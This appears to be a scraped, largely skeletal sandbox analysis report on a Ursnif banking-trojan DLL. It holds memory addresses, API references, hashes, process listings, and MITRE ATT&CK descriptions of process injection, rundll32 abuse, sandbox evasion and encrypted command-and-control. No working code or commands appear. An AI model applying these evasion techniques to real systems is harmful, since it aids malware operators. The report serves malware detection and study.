0x00ee70d0
0x00ee70d0
0x00ee70d6
0x00ee70dd
0x00ee70e0
0x00ee70e3
0x00ee70e9
0x00ee70f5
0x00ee70fc
0x00ee7102
0x00ee710a
0x00ee710c
0x00ee7112
0x00ee7119
0x00ee711d
0x00ee712b
0x00ee712b
0x00ee7135
0x00ee7138
0x00ee7138
0x00ee713e
0x00ee7146
0x00ee714a
0x00ee714b
0x00ee7153
0x00ee7157
0x00ee7158
0x00ee715d
0x00ee7163
0x00ee7166
0x00ee7169
0x00ee716c
0x00ee7179
0x00ee717d
0x00ee717f
0x00ee7181
0x00ee7182
0x00ee7184
0x00ee718e
0x00ee7191
0x00ee7191
0x00ee719d
0x00ee719e
0x00ee719e
0x00ee719e
0x00ee71a6
0x00ee71a8
0x00ee71b0
0x00ee71b4
0x00ee71b5
0x00ee71ba
0x00ee71c2
0x00ee71c6
0x00ee71c7
0x00ee71c7
0x00ee71cc
0x00ee71e0
0x00ee71ea
0x00ee71f0
0x00ee71f1
0x00ee71f7
0x00ee71fb
0x00ee71ff
0x00ee7201

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 00EE70D0
VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 00EE7138

Memory Dump Source

Source File: 00000002.00000002.257292847.0000000000EE0000.00000040.00000001.sdmp, Offset: 00EE0000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction ID: 062078fab969e5057bb8806015f62820867564eca60b304cab4f8fa0e2c8e550
Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction Fuzzy Hash: 77418372908308EFEB049F55CC85BAEBBF5EF88310F05845DED88AB246C7701950DB69

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report gg.gif.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 5408 Parent PID: 5492

General

Chronological Activities

Analysis Process: cmd.exe PID: 5504 Parent PID: 5408

General

Chronological Activities

Analysis Process: rundll32.exe PID: 5572 Parent PID: 5408

Function 02275F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Function 0227709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Function 02271B1E, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Function 02273A14, Relevance: .9, Instructions: 925
COMMONCrypto

Function 02275262, Relevance: .7, Instructions: 740
COMMONCrypto

Function 02275378, Relevance: .7, Instructions: 726
COMMONCrypto

Function 022731B3, Relevance: .6, Instructions: 646
COMMONCrypto

Function 02273FAB, Relevance: .6, Instructions: 566
COMMONCrypto

Function 02271CD0, Relevance: .6, Instructions: 565
COMMONCrypto

Function 022743D8, Relevance: .4, Instructions: 371
COMMONCrypto

Function 02275A25, Relevance: .3, Instructions: 281
COMMONCrypto

Function 02272FAF, Relevance: .2, Instructions: 210
COMMONCrypto

Function 00EE5F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Function 00EE709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON